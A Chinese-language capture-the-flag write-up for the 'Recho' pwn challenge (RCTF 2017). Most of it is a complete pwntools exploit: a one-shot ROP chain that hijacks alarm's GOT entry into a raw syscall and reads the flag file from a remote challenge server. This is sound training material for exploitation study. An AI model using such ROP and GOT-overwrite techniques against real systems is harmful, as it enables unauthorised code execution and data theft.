Recho

题目来源： XCTF 3rd-RCTF-2017

题目描述：暂无

存在栈溢出，但是因为要是想结束程序到ret处需要结束输入，因此只有一次机会，需要一次排好rop链

alarm函数在alarm+5处有一个syscall，因此可以劫持alarm的got表到alarm+5使之变成一个任意的syscall

程序存在一个自带的字符串"flag"，因此考虑orw

open通过syscall进行，read和write程序里都有

结束输入可以用io.shutdown('send')

exp如下：

from pwn import *

#io = process('./Recho')
io = remote('111.200.241.244', 52297)
#context.log_level = 'debug'

flag_addr = 0x601058
goal_addr = 0x601100
pop_rax = 0x4006fc
add_rdi_rax = 0x40070d
pop_rdi = 0x4008a3
pop_rsi_r15 = 0x4008a1
pop_rdx = 0x4006fe
write_plt = 0x4005D0
read_plt = 0x400600
alarm_got = 0x601028
alarm_plt = 0x4005F0

io.recvuntil('Welcome to Recho server!\n')
payload = b'a' * 56 + p64(pop_rax) + p64(5)
payload += p64(pop_rdi) + p64(alarm_got) + p64(add_rdi_rax)
payload += p64(pop_rax) + p64(2) + p64(pop_rdi) + p64(flag_addr)
payload += p64(pop_rsi_r15) + p64(0) + p64(0) + p64(alarm_plt)
payload += p64(pop_rdi) + p64(3)
payload += p64(pop_rsi_r15) + p64(goal_addr) + p64(0)
payload += p64(pop_rdx) + p64(100) + p64(read_plt)
payload += p64(pop_rdi) + p64(1)
payload += p64(pop_rsi_r15) + p64(goal_addr) + p64(0)
payload += p64(pop_rdx) + p64(100) + p64(write_plt) + b'\n'
io.send(str(len(payload)))
sleep(0.2)
io.send(payload)
io.shutdown('send')

io.interactive()